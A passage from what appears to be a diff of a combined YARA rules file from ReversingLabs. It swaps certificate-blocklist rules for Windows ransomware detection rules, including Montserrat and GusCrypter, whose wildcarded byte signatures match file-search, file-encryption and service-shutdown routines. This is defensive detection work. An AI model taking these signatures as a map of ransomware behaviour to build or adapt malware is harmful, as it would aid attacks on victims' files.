?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF + } + $search_and_encrypt_v1_p3 = { + 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A + ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 + ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80 + 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? + ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? + ?? ?? C9 C3 + } + $extract_rsrc_v1 = { + 55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1 + E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ?? + ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 + 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A + ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? + C9 C3 + } + $search_and_encrypt_v2_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F + 84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C + ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 + ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 + } + $search_and_encrypt_v2_p2 = { + E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A + ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F + 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? + ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? + ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 + D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3 + } + $extract_rsrc_v2 = { + 55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 + 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8 + ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? + ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83 + E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 + FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? + ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A + ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 + FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 + ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 + ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kometa" and pe.signatures[i].serial=="4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($extract_rsrc_v1) and ( all of ($search_and_encrypt_v1_p*))) or (($extract_rsrc_v2) and ( all of ($search_and_encrypt_v2_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Montserrat ransomware." author = "ReversingLabs" - id = "a75cc09f-de73-5db4-9ace-189e8da99053" - date = "2023-11-08" - modified = "2023-11-08" + id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3616-L3634" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Montserrat" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ltd. \"Eve Beauty\"" and (pe.signatures[i].serial=="00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures[i].serial=="c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff") and 1583824676<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "d2d71058-f7b9-594f-b099-75aa4774306f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3636-L3654" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B + 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? + 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F + 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? + ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? + 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? + ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? + 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? + 8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 + } + $find_files_p2 = { + EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 + 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? + ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD + 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 + ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? + ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 + ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? + 83 C4 ?? E9 + } + $encrypt_files_p1 = { + 8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83 + 20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89 + 03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? + 8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ?? + C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ?? + ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2 + 75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ?? + 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B + 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? + ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04 + 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A + } + $encrypt_files_p2 = { + 45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B + C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B + 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ?? + 74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D + 75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0 + FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ?? + 8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B + 0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ?? + F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C + 08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74 + ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ?? + 6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? + ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83 + E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3 + } + $shutdown_services_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D + ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ?? + 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B + 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? + ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A + ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B + 47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8 + ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 + } + $shutdown_services_p2 = { + FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87 + ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 + ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ltd. \"Eve Beauty\"" and (pe.signatures[i].serial=="00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures[i].serial=="cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c") and 1578786662<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($shutdown_services_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GusCrypter ransomware." author = "ReversingLabs" - id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463" - date = "2023-11-08" - modified = "2023-11-08" + id = "64aa468c-ec24-58aa-8ea9-23f0cebed227" + date = "2020-11-26" + modified = "2020-11-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3656-L3674" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GusCrypter" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"MPS\"" and (pe.signatures[i].serial=="00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures[i].serial=="ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f") and 1582675200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "0cf7573f-290d-58ac-989f-f82e9313d54e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3676-L3694" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8" - score = 75 - quality = 90 